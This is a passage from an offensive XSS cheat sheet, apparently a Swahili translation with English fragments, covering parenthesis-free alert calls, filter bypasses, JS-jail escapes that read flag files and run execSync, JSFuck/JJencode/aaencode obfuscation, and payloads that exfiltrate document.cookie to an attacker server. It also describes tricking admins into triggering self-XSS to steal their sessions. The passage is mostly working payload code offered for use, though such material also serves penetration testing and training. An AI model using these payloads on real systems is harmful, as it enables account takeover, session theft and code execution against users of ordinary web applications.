Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.



// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''


// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}


// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.

Kuita function yoyote (alert)

javascript

//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')

//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>

Udhaifu za DOM

Kuna JS code inayotumia data isiyo salama inayodhibitiwa na mhamasishaji kama location.href. Mhamasishaji anaweza kutumia hili kutekeleza JS arbitrary.
Kutokana na upanuzi wa maelezo ya Udhaifu za DOM - imehamishwa kwenye ukurasa huu:

DOM XSS

Hapo utapata maelezo ya kina kuhusu ni udhaifu gani za DOM, zinawezaje kusababishwa, na jinsi ya kuzitumia.
Pia, usisahau kwamba mwishoni mwa chapisho kilichotajwa utaona maelezo kuhusu DOM Clobbering attacks.

Kuimarisha Self-XSS

Ikiwa unaweza kusababisha XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ukigundua subdomain iliyo dhaifu kwa XSS, unaweza kutumia XSS hiyo kuingiza cookie katika domain nzima na kusababisha cookie XSS kwenye domain kuu au subdomain nyingine (zile zilizo dhaifu kwa cookie XSS). Kwa hili unaweza kutumia cookie tossing attack:

Cookie Tossing

Unaweza kupata matumizi makubwa ya mbinu hii katika chapisho hili la blogu.

Kutuma session yako kwa admin

Huenda mtumiaji anaweza kushiriki profile yake na admin, na ikiwa self XSS iko ndani ya profile ya mtumiaji na admin ataifikia, atasababisha udhaifu huo.

Kuakisi kikao

Ikiwa unatambua self XSS na ukurasa wa wavuti una session mirroring kwa administrators, kwa mfano kuruhusu wateja kuomba msaada na ili admin akupe msaada atakuwa akiangalia kile unachoona katika session yako lakini kwa session yake.

Unaweza kufanya msimamizi asababisha self XSS yako na kuiba cookies/session zake.

Njia nyingine za kupita

Kupita sanitization kupitia WASM linear-memory template overwrite

Wakati web app inapotumia Emscripten/WASM, constant strings (kama HTML format stubs) zinaishi kwenye writable linear memory. Overflow moja ndani ya WASM (mfano, memcpy isiyochunguzwa kwenye njia ya uhariri) inaweza kuharibu miundo jirani na kuelekeza maandishi kwenye constant hizo. Kuandika upya template kama "

%.*s

" hadi "

" kunageuza input iliyosanitiwa kuwa thamani ya handler ya JavaScript na kusababisha DOM XSS mara moja wakati wa render.

Angalia ukurasa maalum wenye mtiririko wa exploitation, DevTools memory helpers, na mbinu za ulinzi:

Wasm Linear Memory Template Overwrite Xss

Normalised Unicode

Unaweza kuangalia kama reflected values zinafanyiwa unicode normalized upande wa server (au upande wa client) na kutumia vibaya utendakazi huu kupita ulinzi. Pata mfano hapa.

PHP FILTER_VALIDATE_EMAIL flag Bypass

javascript

"><svg/onload=confirm(1)>"@x.y

Ruby-On-Rails bypass

Kutokana na RoR mass assignment alama za nukuu zinaingizwa kwenye HTML, na hivyo kikomo cha nukuu kinaweza kupitishwa na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.
Mfano wa fomu (from this report), ikiwa utatuma payload:

contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa

Jozi "Key","Value" itarudishwa kama ifuatavyo:

{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}

Kisha, attribute onfocus itaingizwa na XSS itatokee.

Mchanganyiko maalum

html

<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)

XSS with header injection in a 302 response

Ikiwa ugundua kuwa unaweza inject headers in a 302 Redirect response unaweza kujaribu make the browser execute arbitrary JavaScript. Hii si rahisi kama ilivyo kawaida kwa sababu modern browsers hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo just a cross-site scripting payload haifai.

In this report and this one unaweza kusoma jinsi ya kujaribu protokoli kadhaa ndani ya Location header na kuona kama yoyote yao inaruhusu browser kuchunguza na execute XSS payload ndani ya body.\
Past known protocols: mailto://, //x:1/, ws://, wss://, empty Location header, resource://.

Herufi Pekee, Nambari na Nukta

If you are able to indicate the callback that javascript is going to execute limited to those chars. Read this section of this post to find how to abuse this behaviour.

Content-Types Sahihi za `<script>` kwa XSS

(From here) If you try to load a script with a content-type such as application/octet-stream, Chrome will throw following error:

Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx' because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.

The only Content-Types that will support Chrome to run a loaded script are the ones inside the const kSupportedJavascriptTypes from https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc

const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};

Aina za Script kwa XSS

(Kutoka here) Basi, ni aina gani zinaweza kuonyeshwa ili kupakia script?

html

<script type="???"></script>

Jibu ni:

module (chaguo-msingi, hakuna cha kufafanua)
webbundle: Web Bundles ni kipengele kinachokuruhusu kuweka pamoja data nyingi (HTML, CSS, JS…) katika faili ya .wbn.

html

<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP

importmap: Inaruhusu kuboresha import syntax

html

<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>

<!-- With importmap you can do the following -->
<script>
import moment from "moment"
import { partition } from "lodash"
</script>

Tabia hii ilitumika katika this writeup kuremapa laibrari kwa eval ili kuitumia vibaya — inaweza kusababisha XSS.

speculationrules: Kipengele hiki hasa kilikusudiwa kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kinafanya kazi hivi:

html

<script type="speculationrules">
{
"prerender": [
{ "source": "list", "urls": ["/page/2"], "score": 0.5 },
{
"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1
}
]
}
</script>

Content-Types za Web kwa XSS

(Kutoka here) Aina zifuatazo za Content-Types zinaweza kutekeleza XSS katika browsers zote:

text/html
application/xhtml+xml
application/xml
text/xml
image/svg+xml
text/plain (?? haipo kwenye orodha lakini nadhani niliona hii kwenye CTF)
application/rss+xml (off)
application/atom+xml (off)

Katika browsers nyingine, aina nyingine za Content-Types zinaweza kutumika kuendesha JS yoyote, angalia: https://github.com/BlackFan/content-type-research/blob/master/XSS.md

xml Content Type

Kama ukurasa unarudisha text/xml content-type, inawezekana kuonyesha namespace na kuendesha JS yoyote:

xml

<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>

<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->

Mifumo Maalum ya Ubadilishaji

Wakati kitu kama "some {{template}} data".replace("{{template}}", <user_input>) kinapotumika. Mshambuliaji anaweza kutumia special string replacements kujaribu kuvuka baadhi ya kinga: "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))

Kwa mfano katika this writeup, hili lilitumika kwa ku-escape JSON string ndani ya script na kutekeleza arbitrary code.

Chrome Cache to XSS

XS Jails Escape

Ikiwa una seti ndogo tu ya chars za kutumia, angalia suluhisho hizi nyingine sahihi kwa matatizo ya XSJail:

javascript

// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))

// use of with
with(console)log(123)
with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))

with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))

//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()

// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE

Iwapo everything is undefined kabla ya kuendesha untrusted code (kama katika this writeup), inawezekana kuunda vitu muhimu "out of nothing" ili kuabusu execution ya arbitrary untrusted code:

Using import()

javascript

// although import "fs" doesn’t work, import('fs') does.
import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))

Kupata require kwa njia isiyo ya moja kwa moja

Kulingana na hii moduli zimefungwa na Node.js ndani ya function, kama ifuatavyo:

javascript

;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})

Hivyo, ikiwa kutoka module hiyo tunaweza call another function, inawezekana kutumia arguments.callee.caller.arguments[1] kutoka function hiyo kufikia require:

javascript

;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
"/flag.txt",
"utf8"
)
})()

Kwa njia sawa na mfano uliopita, inawezekana use error handlers kufikia wrapper ya module na kupata require function:

javascript

try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = "".constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) =>
structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log("=".repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req("child_process").execSync("id").toString())
}
}
}
trigger()

Obfuscation & Advanced Bypass

Different obfuscations kwenye ukurasa mmoja: https://aem1k.com/aurebesh.js/
https://github.com/aemkei/katakana.js
https://javascriptobfuscator.herokuapp.com/
https://skalman.github.io/UglifyJS-online/
http://www.jsfuck.com/
JSFuck ya hali ya juu zaidi: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce
http://utf-8.jp/public/jjencode.html
https://utf-8.jp/public/aaencode.html
https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses

javascript

//Katana
<script>
([,ウ,,,,ア]=[]+{}
,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
</script>

javascript

//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

javascript

//JSFuck
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>

javascript

//aaencode
ﾟωﾟﾉ = /｀ｍ´）ﾉ ~┻━┻   / /*´∇｀*/["_"]
o = ﾟｰﾟ = _ = 3
c = ﾟΘﾟ = ﾟｰﾟ - ﾟｰﾟ
ﾟДﾟ = ﾟΘﾟ = (o ^ _ ^ o) / (o ^ _ ^ o)
ﾟДﾟ = {
ﾟΘﾟ: "_",
ﾟωﾟﾉ: ((ﾟωﾟﾉ == 3) + "_")[ﾟΘﾟ],
ﾟｰﾟﾉ: (ﾟωﾟﾉ + "_")[o ^ _ ^ (o - ﾟΘﾟ)],
ﾟДﾟﾉ: ((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ],
}
ﾟДﾟ[ﾟΘﾟ] = ((ﾟωﾟﾉ == 3) + "_")[c ^ _ ^ o]
ﾟДﾟ["c"] = (ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ - ﾟΘﾟ]
ﾟДﾟ["o"] = (ﾟДﾟ + "_")[ﾟΘﾟ]
ﾟoﾟ =
ﾟДﾟ["c"] +
ﾟДﾟ["o"] +
(ﾟωﾟﾉ + "_")[ﾟΘﾟ] +
((ﾟωﾟﾉ == 3) + "_")[ﾟｰﾟ] +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ - ﾟΘﾟ] +
ﾟДﾟ["c"] +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
ﾟДﾟ["o"] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ]
ﾟДﾟ["_"] = (o ^ _ ^ o)[ﾟoﾟ][ﾟoﾟ]
ﾟεﾟ =
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
ﾟДﾟ.ﾟДﾟﾉ +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
((ﾟｰﾟ == 3) + "_")[o ^ _ ^ (o - ﾟΘﾟ)] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
(ﾟωﾟﾉ + "_")[ﾟΘﾟ]
ﾟｰﾟ += ﾟΘﾟ
ﾟДﾟ[ﾟεﾟ] = "\\"
ﾟДﾟ.ﾟΘﾟﾉ = (ﾟДﾟ + ﾟｰﾟ)[o ^ _ ^ (o - ﾟΘﾟ)]
oﾟｰﾟo = (ﾟωﾟﾉ + "_")[c ^ _ ^ o]
ﾟДﾟ[ﾟoﾟ] = '"'
ﾟДﾟ["_"](
ﾟДﾟ["_"](
ﾟεﾟ +
ﾟДﾟ[ﾟoﾟ] +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟΘﾟ +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
(ﾟｰﾟ + (o ^ _ ^ o)) +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟΘﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
(o ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(o ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟΘﾟ +
ﾟДﾟ[ﾟoﾟ]
)(ﾟΘﾟ)
)("_")

javascript

// It's also possible to execute JS code only with the chars: []`+!${}

XSS payloads za kawaida

Payloads kadhaa ndani ya 1

Steal Info JS

Iframe Trap

Mfanye mtumiaji avinjari kwenye ukurasa bila kutoka kwenye iframe na uibe vitendo vyake (ikijumuisha taarifa zilizotumwa kwenye fomu):

Iframe Traps

Pata Cookies

javascript

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
